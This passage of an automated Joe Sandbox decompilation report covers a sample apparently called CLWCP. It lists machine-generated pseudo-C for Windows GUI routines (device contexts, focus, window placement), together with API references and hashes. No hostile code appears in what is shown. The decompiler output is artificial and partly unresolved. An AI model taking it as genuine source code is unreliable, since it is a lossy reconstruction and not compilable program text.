                                  								_v28 = SaveDC( *(_v40 + 0x18));
                                  								_push(_t377);
                                  								_push(0x449b72);
                                  								_push( *[fs:eax]);
                                  								 *[fs:eax] = _t379;
                                  								E0041E958(_v24,  *(_v40 + 0x18));
                                  								E0041E7EC(_v24);
                                  								E0044A020(_v16, _v40 + 0x1c, _v24,  *(_v40 + 0x10) & 0x0000ffff);
                                  								_pop(_t333);
                                  								 *[fs:eax] = _t333;
                                  								_push(0x449b79);
                                  								__eflags = 0;
                                  								E0041E958(_v24, 0);
                                  								return RestoreDC( *(_v40 + 0x18), _v28);
                                  							}
                                  						} else {
                                  							_t214 = _t182 - 1;
                                  							if(_t214 == 0) {
                                  								_v44 =  *((intOrPtr*)(__edx + 8));
                                  								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  								__eflags = _t286;
                                  								if(_t286 < 0) {
                                  									goto L67;
                                  								} else {
                                  									_t287 = _t286 + 1;
                                  									_t372 = 0;
                                  									__eflags = 0;
                                  									while(1) {
                                  										_v16 = E004488BC(E00413D2C(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                  										__eflags = _v16;
                                  										if(_v16 != 0) {
                                  											break;
                                  										}
                                  										_t372 = _t372 + 1;
                                  										_t287 = _t287 - 1;
                                  										__eflags = _t287;
                                  										if(_t287 != 0) {
                                  											continue;
                                  										} else {
                                  											goto L67;
                                  										}
                                  										goto L69;
                                  									}
                                  									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                  									L004067EC();
                                  									_v32 = _t221;
                                  									 *[fs:eax] = _t379;
                                  									_v24 = E0041DFC8(0, 1);
                                  									 *[fs:eax] = _t379;
                                  									_v28 = SaveDC(_v32);
                                  									 *[fs:eax] = _t379;
                                  									E0041E958(_v24, _v32);
                                  									E0041E7EC(_v24);
                                  									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x449c90, _t377,  *[fs:eax], 0x449cad, _t377,  *[fs:eax], 0x449cd2, _t377, _t221);
                                  									_pop(_t342);
                                  									 *[fs:eax] = _t342;
                                  									_push(0x449c97);
                                  									__eflags = 0;
                                  									E0041E958(_v24, 0);
                                  									return RestoreDC(_v32, _v28);
                                  								}
                                  							} else {
                                  								if(_t214 == 0x27) {
                                  									_v36 =  *((intOrPtr*)(__edx + 8));
                                  									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                  									__eflags = _t290;
                                  									if(_t290 < 0) {
                                  										goto L67;
                                  									} else {
                                  										_t291 = _t290 + 1;
                                  										_t373 = 0;
                                  										__eflags = 0;
                                  										while(1) {
                                  											_t251 =  *((intOrPtr*)( *((intOrPtr*)(E00413D2C(_v8, _t373))) + 0x34))();
                                  											_t346 = _v36;
                                  											__eflags = _t251 -  *((intOrPtr*)(_t346 + 0xc));
                                  											if(_t251 !=  *((intOrPtr*)(_t346 + 0xc))) {
                                  												_v16 = E004488BC(E00413D2C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                  											} else {
                                  												_v16 =  *((intOrPtr*)(E00413D2C(_v8, _t373) + 0x34));
                                  											}
                                  											__eflags = _v16;
                                  											if(_v16 != 0) {
                                  												break;
                                  											}
                                  											_t373 = _t373 + 1;
                                  											_t291 = _t291 - 1;
                                  											__eflags = _t291;
                                  											if(_t291 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  											goto L68;
                                  										}
                                  										_t257 = E004488EC(E00413D2C(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                  										__eflags = _t257;
                                  										if(_t257 == 0) {
                                  											_t265 = E00413D2C(_v8, _t373);
                                  											__eflags = 0;
                                  											_t257 = E004488EC(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                  										}
                                  										_t353 =  *0x46fda0; // 0x470b44
                                  										_t355 =  *( *_t353 + 0x6c);
                                  										__eflags = _t355;
                                  										if(_t355 != 0) {
                                  											__eflags = _t257;
                                  											if(_t257 == 0) {
                                  												_t257 =  *(_t355 + 0x160);
                                  											}
                                  											__eflags =  *(_t355 + 0x240) & 0x00000008;
                                  											if(( *(_t355 + 0x240) & 0x00000008) == 0) {
                                  												_t356 =  *0x46fc50; // 0x470b40
                                  												E00456AA8( *_t356, _t291, _t257, _t373, _t375);
                                  											} else {
                                  												E00456B34();
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L67:
                                  									_push( *(_t375 + 8));
                                  									_push( *(_t375 + 4));
                                  									_push( *_t375);
                                  									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                  									_push(_t144);
                                  									L004065DC();
                                  									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                  								}
                                  								L68:
                                  								_pop(_t311);
                                  								 *[fs:eax] = _t311;
                                  								_push(0x449d63);
                                  								return E0040411C( &_v52);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L69:
                                  			}

                                  APIs
                                  • SaveDC.GDI32(?), ref: 00449AF8
                                  • RestoreDC.GDI32(?,?), ref: 00449B6C
                                  • 72E7B080.USER32(?,00000000,00449D5C), ref: 00449BE6
                                  • SaveDC.GDI32(?), ref: 00449C1D
                                  • RestoreDC.GDI32(?,?), ref: 00449C8A
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,00449D5C), ref: 00449D3E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4024241980-0
                                  • Opcode ID: 1fb4e2a48ac0238c1ff480ee32bac1e6ff1ba54309458c1679799e46c463326e
                                  • Instruction ID: 09e57a042879af9c29ac59feede5ade872512784bd6a3cffa02f05b98a09712a
                                  • Opcode Fuzzy Hash: 1fb4e2a48ac0238c1ff480ee32bac1e6ff1ba54309458c1679799e46c463326e
                                  • Instruction Fuzzy Hash: 55E16174A002099FEB10DFAAD48199FF7F5FF88304B6185AAE805A7361C738ED41DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0044EE08(intOrPtr __eax, struct HWND__** __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				intOrPtr _v16;
                                  				struct HDC__* _v20;
                                  				struct HWND__* _v24;
                                  				void* __ebp;
                                  				struct HWND__* _t99;
                                  				intOrPtr _t109;
                                  				intOrPtr _t114;
                                  				intOrPtr _t130;
                                  				intOrPtr _t133;
                                  				struct HWND__* _t139;
                                  				struct HWND__* _t142;
                                  				intOrPtr _t146;
                                  				struct HWND__* _t147;
                                  				intOrPtr _t148;
                                  				intOrPtr _t149;
                                  				struct HWND__* _t151;
                                  				struct HWND__* _t154;
                                  				intOrPtr _t160;
                                  				intOrPtr _t190;
                                  				struct HDC__* _t195;
                                  				struct HWND__** _t218;
                                  				void* _t221;
                                  				struct HWND__* _t239;
                                  				struct HWND__* _t240;
                                  				struct HWND__* _t242;
                                  				void* _t255;
                                  				void* _t256;
                                  				intOrPtr _t262;
                                  				intOrPtr _t270;
                                  				struct HWND__* _t274;
                                  				struct HWND__* _t275;
                                  				struct HWND__* _t276;
                                  				struct HWND__* _t281;
                                  				struct HWND__* _t282;
                                  				struct HWND__* _t283;
                                  				struct HWND__* _t284;
                                  				void* _t286;
                                  				void* _t288;
                                  				intOrPtr _t289;
                                  				void* _t291;
                                  				void* _t295;
                                  
                                  				_t286 = _t288;
                                  				_t289 = _t288 + 0xffffffec;
                                  				_t218 = __edx;
                                  				_v8 = __eax;
                                  				_t99 =  *__edx;
                                  				_t239 = _t99;
                                  				_t291 = _t239 - 0x46;
                                  				if(_t291 > 0) {
                                  					_t240 = _t239 - 0xb01a;
                                  					__eflags = _t240;
                                  					if(_t240 == 0) {
                                  						__eflags =  *(_v8 + 0xa0);
                                  						if(__eflags != 0) {
                                  							E00403594(_v8, __eflags);
                                  						}
                                  					} else {
                                  						_t242 = _t240 - 1;
                                  						__eflags = _t242;
                                  						if(_t242 == 0) {
                                  							__eflags =  *(_v8 + 0xa0);
                                  							if(__eflags != 0) {
                                  								E00403594(_v8, __eflags);
                                  							}
                                  						} else {
                                  							__eflags = _t242 == 0x2c;
                                  							if(_t242 == 0x2c) {
                                  								_t281 = __edx[1];
                                  								_t274 = 0;
                                  								while(1) {
                                  									__eflags = _t281;
                                  									if(_t281 == 0) {
                                  										break;
                                  									}
                                  									__eflags = _t274;
                                  									if(_t274 == 0) {
                                  										_t274 = E004318A4(_t281, _t221);
                                  										_t281 = GetParent(_t281);
                                  										continue;
                                  									}
                                  									break;
                                  								}
                                  								__eflags = _t274;
                                  								if(_t274 != 0) {
                                  									_t282 = E0044C8E0(_t274, 1);
                                  									_t109 = _v8;
                                  									__eflags = _t274 -  *((intOrPtr*)(_t109 + 0x238));
                                  									if(_t274 !=  *((intOrPtr*)(_t109 + 0x238))) {
                                  										__eflags = _t282;
                                  										if(_t282 != 0) {
                                  											__eflags = _t282 - _v8;
                                  											if(_t282 == _v8) {
                                  												L30:
                                  												_t110 =  *(_t282 + 0x238);
                                  												__eflags =  *(_t282 + 0x238);
                                  												if( *(_t282 + 0x238) != 0) {
                                  													__eflags = 0;
                                  													E00435DE4(_t110, 0, 8, 0);
                                  												}
                                  												 *((intOrPtr*)(_t282->i + 0xf4))();
                                  											} else {
                                  												_t114 =  *0x470b44; // 0x0
                                  												__eflags = _t282 -  *((intOrPtr*)(_t114 + 0x68));
                                  												if(_t282 !=  *((intOrPtr*)(_t114 + 0x68))) {
                                  													goto L30;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								goto L54;
                                  							}
                                  						}
                                  					}
                                  					goto L56;
                                  				} else {
                                  					if(_t291 == 0) {
                                  						_t130 = _v8;
                                  						__eflags = ( *0x44f2cc & 0x0000ffff) - ( *(_t130 + 0x1c) & 0x0000ffff &  *0x44f2c8);
                                  						if(( *0x44f2cc & 0x0000ffff) == ( *(_t130 + 0x1c) & 0x0000ffff &  *0x44f2c8)) {
                                  							_t133 = _v8;
                                  							__eflags = ( *(_t133 + 0x248) & 0x000000ff) - 0xffffffffffffffff;
                                  							if(( *(_t133 + 0x248) & 0x000000ff) - 0xffffffffffffffff < 0) {
                                  								_t146 = _v8;
                                  								__eflags =  *((char*)(_t146 + 0x243)) - 2;
                                  								if( *((char*)(_t146 + 0x243)) != 2) {
                                  									_t147 = __edx[2];
                                  									_t33 = _t147 + 0x18;
                                  									 *_t33 =  *(_t147 + 0x18) | 0x00000002;
                                  									__eflags =  *_t33;
                                  								}
                                  							}
                                  							_t139 = ( *(_v8 + 0x248) & 0x000000ff) - 1;
                                  							__eflags = _t139;
                                  							if(_t139 == 0) {
                                  								L43:
                                  								_t142 = ( *(_v8 + 0x241) & 0x000000ff) - 2;
                                  								__eflags = _t142;
                                  								if(_t142 == 0) {
                                  									L45:
                                  									 *( *((intOrPtr*)(_t218 + 8)) + 0x18) =  *( *((intOrPtr*)(_t218 + 8)) + 0x18) | 0x00000001;
                                  								} else {
                                  									__eflags = _t142 == 3;
                                  									if(_t142 == 3) {
                                  										goto L45;
                                  									}
                                  								}
                                  							} else {
                                  								__eflags = _t139 == 2;
                                  								if(_t139 == 2) {
                                  									goto L43;
                                  								}
                                  							}
                                  						}
                                  						goto L56;
                                  					} else {
                                  						_t255 = _t239 + 0xfffffffa - 3;
                                  						if(_t255 < 0) {
                                  							__eflags =  *0x46ef44;
                                  							if( *0x46ef44 != 0) {
                                  								__eflags =  *__edx - 7;
                                  								if( *__edx != 7) {
                                  									goto L56;
                                  								} else {
                                  									_t148 = _v8;
                                  									__eflags =  *(_t148 + 0x1c) & 0x00000010;
                                  									if(( *(_t148 + 0x1c) & 0x00000010) != 0) {
                                  										goto L56;
                                  									} else {
                                  										_t283 = 0;
                                  										_t149 = _v8;
                                  										__eflags =  *((char*)(_t149 + 0x247)) - 2;
                                  										if( *((char*)(_t149 + 0x247)) != 2) {
                                  											_t151 =  *(_v8 + 0x238);
                                  											__eflags = _t151;
                                  											if(_t151 != 0) {
                                  												__eflags = _t151 - _v8;
                                  												if(_t151 != _v8) {
                                  													_t283 = E0043BA58(_t151);
                                  												}
                                  											}
                                  										} else {
                                  											_t154 = E0044F850(_v8);
                                  											__eflags = _t154;
                                  											if(_t154 != 0) {
                                  												_t283 = E0043BA58(E0044F850(_v8));
                                  											}
                                  										}
                                  										__eflags = _t283;
                                  										if(_t283 == 0) {
                                  											goto L56;
                                  										} else {
                                  											_t99 = SetFocus(_t283);
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L57;
                                  						} else {
                                  							_t256 = _t255 - 0x22;
                                  							if(_t256 == 0) {
                                  								_v24 = __edx[2];
                                  								__eflags = _v24->i - 1;
                                  								if(_v24->i != 1) {
                                  									goto L56;
                                  								} else {
                                  									_t160 = _v8;
                                  									__eflags =  *(_t160 + 0x260);
                                  									if( *(_t160 + 0x260) == 0) {
                                  										goto L56;
                                  									} else {
                                  										_t275 = E004488BC( *((intOrPtr*)(_v8 + 0x260)), 0,  *((intOrPtr*)(_v24 + 8)));
                                  										__eflags = _t275;
                                  										if(_t275 == 0) {
                                  											goto L56;
                                  										} else {
                                  											_v16 = E0041DFC8(0, 1);
                                  											_push(_t286);
                                  											_push(0x44f113);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t289;
                                  											_v12 = SaveDC( *(_v24 + 0x18));
                                  											_push(_t286);
                                  											_push(0x44f0f6);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t289;
                                  											E0041E958(_v16,  *(_v24 + 0x18));
                                  											E0041E7EC(_v16);
                                  											E0044A020(_t275, _v24 + 0x1c, _v16,  *(_v24 + 0x10) & 0x0000ffff);
                                  											_pop(_t262);
                                  											 *[fs:eax] = _t262;
                                  											_push(0x44f0fd);
                                  											__eflags = 0;
                                  											E0041E958(_v16, 0);
                                  											return RestoreDC( *(_v24 + 0x18), _v12);
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								if(_t256 == 1) {
                                  									_t284 = __edx[2];
                                  									__eflags = _t284->i - 1;
                                  									if(_t284->i != 1) {
                                  										goto L56;
                                  									} else {
                                  										_t190 = _v8;
                                  										__eflags =  *(_t190 + 0x260);
                                  										if( *(_t190 + 0x260) == 0) {
                                  											goto L56;
                                  										} else {
                                  											_t276 = E004488BC( *((intOrPtr*)(_v8 + 0x260)), 0,  *((intOrPtr*)(_t284 + 8)));
                                  											__eflags = _t276;
                                  											if(_t276 == 0) {
                                  												goto L56;
                                  											} else {
                                  												_t195 = E0043BA58(_v8);
                                  												L004067EC();
                                  												_v20 = _t195;
                                  												 *[fs:eax] = _t289;
                                  												_v16 = E0041DFC8(0, 1);
                                  												 *[fs:eax] = _t289;
                                  												_v12 = SaveDC(_v20);
                                  												 *[fs:eax] = _t289;
                                  												E0041E958(_v16, _v20);
                                  												E0041E7EC(_v16);
                                  												 *((intOrPtr*)(_t276->i + 0x38))(_t284 + 0x10,  *[fs:eax], 0x44f1fd, _t286,  *[fs:eax], 0x44f21a, _t286,  *[fs:eax], 0x44f241, _t286, _t195);
                                  												_pop(_t270);
                                  												 *[fs:eax] = _t270;
                                  												_push(0x44f204);
                                  												__eflags = 0;
                                  												E0041E958(_v16, 0);
                                  												return RestoreDC(_v20, _v12);
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L54:
                                  									_t295 = _t99 -  *0x470b4c; // 0xc075
                                  									if(_t295 == 0) {
                                  										E00435DE4(_v8, 0, 0xb025, 0);
                                  										E00435DE4(_v8, 0, 0xb024, 0);
                                  										E00435DE4(_v8, 0, 0xb035, 0);
                                  										E00435DE4(_v8, 0, 0xb009, 0);
                                  										E00435DE4(_v8, 0, 0xb008, 0);
                                  										E00435DE4(_v8, 0, 0xb03d, 0);
                                  									}
                                  									L56:
                                  									_t99 = E00439164(_v8, _t218);
                                  									L57:
                                  									return _t99;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}















































                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080Focus
                                  • String ID:
                                  • API String ID: 809140284-0
                                  • Opcode ID: c1000b6fd7469b59d075527098db081a5f4eb8dd0df2819162cf3bd1692ab139
                                  • Instruction ID: 0f80a1b3848f0665af197b3bcb2ec70a2cd127db36cc255f33338636449eb934
                                  • Opcode Fuzzy Hash: c1000b6fd7469b59d075527098db081a5f4eb8dd0df2819162cf3bd1692ab139
                                  • Instruction Fuzzy Hash: 62C18C35A00504DFEB10DFA9C986AAEB7F1BB48304F2540F6F804AB351DB79AE45DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 41%
                                  			E00455CB0(void* __eax) {
                                  				struct HWND__* _t21;
                                  				intOrPtr* _t26;
                                  				signed int _t29;
                                  				intOrPtr* _t30;
                                  				int _t33;
                                  				intOrPtr _t36;
                                  				void* _t53;
                                  				int _t63;
                                  
                                  				_t53 = __eax;
                                  				_t21 = IsIconic( *(__eax + 0x30));
                                  				if(_t21 != 0) {
                                  					SetActiveWindow( *(_t53 + 0x30));
                                  					if( *((intOrPtr*)(_t53 + 0x44)) == 0 ||  *((char*)(_t53 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t53 + 0x44)) + 0x57)) == 0) {
                                  						L6:
                                  						E00454954( *(_t53 + 0x30), 9, __eflags);
                                  					} else {
                                  						_t63 = IsWindowEnabled(E0043BA58( *((intOrPtr*)(_t53 + 0x44))));
                                  						if(_t63 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_push(0);
                                  							_push(0xf120);
                                  							_push(0x112);
                                  							_push( *(_t53 + 0x30));
                                  							L004065DC();
                                  						}
                                  					}
                                  					_t26 =  *0x46fb00; // 0x470904
                                  					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                  					if(_t63 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					_t30 =  *0x46fb00; // 0x470904
                                  					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                  					if(_t63 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					SetWindowPos( *(_t53 + 0x30), 0, _t33, ??, ??, ??, ??);
                                  					_t36 =  *((intOrPtr*)(_t53 + 0x44));
                                  					if(_t36 != 0 &&  *((char*)(_t36 + 0x243)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                  						E0044FFB8(_t36, 0);
                                  						E00452918( *((intOrPtr*)(_t53 + 0x44)));
                                  					}
                                  					E004551A4(_t53);
                                  					E00455280(_t53, 1);
                                  					_t21 =  *0x470b44; // 0x0
                                  					_t58 =  *((intOrPtr*)(_t21 + 0x64));
                                  					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                  						_t21 = SetFocus(E0043BA58(_t58));
                                  					}
                                  					if( *((short*)(_t53 + 0x14a)) != 0) {
                                  						return  *((intOrPtr*)(_t53 + 0x148))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}












                                  APIs
                                  • IsIconic.USER32 ref: 00455CB8
                                  • SetActiveWindow.USER32(?,?,?,?,004556BA,00000000,00455B85), ref: 00455CC9
                                  • IsWindowEnabled.USER32(00000000), ref: 00455CEC
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,004556BA,00000000,00455B85), ref: 00455D05
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,004556BA,00000000,00455B85), ref: 00455D4B
                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,004556BA,00000000,00455B85), ref: 00455D99
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  • Opcode ID: fb014da5266c4c16b6f7053b04469e66e8697bc3dc2c3197cee4a033a0f1df3b
                                  • Instruction ID: 5a2f7ce4cfdb644451eb6710542262997155accf482319792de41ac61588b825
                                  • Opcode Fuzzy Hash: fb014da5266c4c16b6f7053b04469e66e8697bc3dc2c3197cee4a033a0f1df3b
                                  • Instruction Fuzzy Hash: 623132717006409BEB11EB69CD99B6A27A8AF04705F045076FE00DF2D7D67DEC4C8759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E0043B440(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                  				void* _v20;
                                  				struct _WINDOWPLACEMENT _v48;
                                  				char _v64;
                                  				int _t52;
                                  				intOrPtr* _t53;
                                  				int _t58;
                                  				int _t60;
                                  
                                  				_t58 = __ecx;
                                  				_t60 = __edx;
                                  				_t53 = __eax;
                                  				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                  					L4:
                                  					if(E0043BD58(_t53) == 0 || IsIconic( *(_t53 + 0x188)) != 0) {
                                  						 *(_t53 + 0x40) = _t60;
                                  						 *(_t53 + 0x44) = _t58;
                                  						 *((intOrPtr*)(_t53 + 0x48)) = _a8;
                                  						 *((intOrPtr*)(_t53 + 0x4c)) = _a4;
                                  						if(E0043BD58(_t53) != 0) {
                                  							_v48.length = 0x2c;
                                  							GetWindowPlacement( *(_t53 + 0x188),  &_v48);
                                  							E0043452C(_t53,  &_v64);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							SetWindowPlacement( *(_t53 + 0x188),  &_v48);
                                  						}
                                  					} else {
                                  						SetWindowPos( *(_t53 + 0x188), 0, _t60, _t58, _a8, _a4, 0x14);
                                  					}
                                  					E004341BC(_t53);
                                  					return  *((intOrPtr*)( *_t53 + 0x5c))();
                                  				} else {
                                  					_t52 = _a4;
                                  					if(_t52 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                  						return _t52;
                                  					}
                                  					goto L4;
                                  				}
                                  			}











                                  APIs
                                  • IsIconic.USER32 ref: 0043B47F
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043B49D
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 0043B4D3
                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 0043B4F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  • Opcode ID: 31b7f604ee925892cdeaf68c8ac4d391b8badba892ade3640f10d795a3759762
                                  • Instruction ID: c811ad25a5ff51377b337d87554d198d794822adca6e6ca1eb4e006a83861541
                                  • Opcode Fuzzy Hash: 31b7f604ee925892cdeaf68c8ac4d391b8badba892ade3640f10d795a3759762
                                  • Instruction Fuzzy Hash: 4E213D71600204ABCF54EF69D8C0ACA77A8EF58314F00946AFE14EF213D779E9448BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00425458(void* __edi, struct HWND__* _a4, signed int _a8) {
                                  				struct _WINDOWPLACEMENT _v48;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t19;
                                  				intOrPtr _t21;
                                  				struct HWND__* _t23;
                                  
                                  				_t19 = _a8;
                                  				_t23 = _a4;
                                  				if( *0x47092d != 0) {
                                  					if((_t19 & 0x00000003) == 0) {
                                  						if(IsIconic(_t23) == 0) {
                                  							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                  						} else {
                                  							GetWindowPlacement(_t23,  &_v48);
                                  						}
                                  						return E004253C8( &(_v48.rcNormalPosition), _t19);
                                  					}
                                  					return 0x12340042;
                                  				}
                                  				_t21 =  *0x470908; // 0x425458
                                  				 *0x470908 = E0042525C(1, _t19, _t21, __edi, _t23);
                                  				return  *0x470908(_t23, _t19);
                                  			}











                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressProc
                                  • String ID: MonitorFromWindow$XTB
                                  • API String ID: 190572456-2855592348
                                  • Opcode ID: 0bd57dbfd4fe034ee3467546fc4a3bfcb67cf5c19c73e596f4cd550d199d7355
                                  • Instruction ID: a08b6d51f10c2da5b72c8f38d320b22b71717a108d657d3bd89b7038703973bf
                                  • Opcode Fuzzy Hash: 0bd57dbfd4fe034ee3467546fc4a3bfcb67cf5c19c73e596f4cd550d199d7355
                                  • Instruction Fuzzy Hash: 5101A7B27025289A9700FB51AC41ABFF36CDF04315B808527F91993242D73CAD8147BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00455BEC(void* __eax) {
                                  				int _t21;
                                  				int _t37;
                                  				int _t39;
                                  				struct HWND__* _t41;
                                  				void* _t45;
                                  
                                  				_t45 = __eax;
                                  				_t1 = _t45 + 0x30; // 0x61572065
                                  				_t21 = IsIconic( *_t1);
                                  				if(_t21 == 0) {
                                  					E00455144();
                                  					_t2 = _t45 + 0x30; // 0x61572065
                                  					SetActiveWindow( *_t2);
                                  					E00455280(_t45, 0);
                                  					if( *((intOrPtr*)(_t45 + 0x44)) == 0 ||  *((char*)(_t45 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t45 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043BA58( *((intOrPtr*)(_t45 + 0x44)))) == 0) {
                                  						_t15 = _t45 + 0x30; // 0x61572065
                                  						_t21 = E00454954( *_t15, 6, __eflags);
                                  					} else {
                                  						_t37 = E0044E87C( *((intOrPtr*)(_t45 + 0x44)));
                                  						_t39 = E0044E85C( *((intOrPtr*)(_t45 + 0x44)));
                                  						_t41 = E0043BA58( *((intOrPtr*)(_t45 + 0x44)));
                                  						_t13 = _t45 + 0x30; // 0x61572065
                                  						SetWindowPos( *_t13, _t41, _t39, _t37,  *( *((intOrPtr*)(_t45 + 0x44)) + 0x48), 0, 0x40);
                                  						_push(0);
                                  						_push(0xf020);
                                  						_push(0x112);
                                  						_t14 = _t45 + 0x30; // 0x61572065
                                  						_t21 =  *_t14;
                                  						_push(_t21);
                                  						L004065DC();
                                  					}
                                  					if( *((short*)(_t45 + 0x142)) != 0) {
                                  						return  *((intOrPtr*)(_t45 + 0x140))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}









                                  APIs
                                  • IsIconic.USER32 ref: 00455BF3
                                  • SetActiveWindow.USER32(61572065,61572065,?,00456460), ref: 00455C0B
                                    • Part of subcall function 00455280: EnumWindows.USER32(00455210,00000000), ref: 004552AA
                                    • Part of subcall function 00455280: ShowOwnedPopups.USER32(00000000,?,00455210,00000000,?,?,0046D588,00455C19,61572065,61572065,?,00456460), ref: 004552D9
                                  • IsWindowEnabled.USER32(00000000), ref: 00455C37
                                  • SetWindowPos.USER32(61572065,00000000,00000000,00000000,?,00000000,00000040,00000000,61572065,61572065,?,00456460), ref: 00455C6A
                                  • NtdllDefWindowProc_A.USER32(61572065,00000112,0000F020,00000000,61572065,00000000,00000000,00000000,?,00000000,00000040,00000000,61572065,61572065,?,00456460), ref: 00455C7F
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
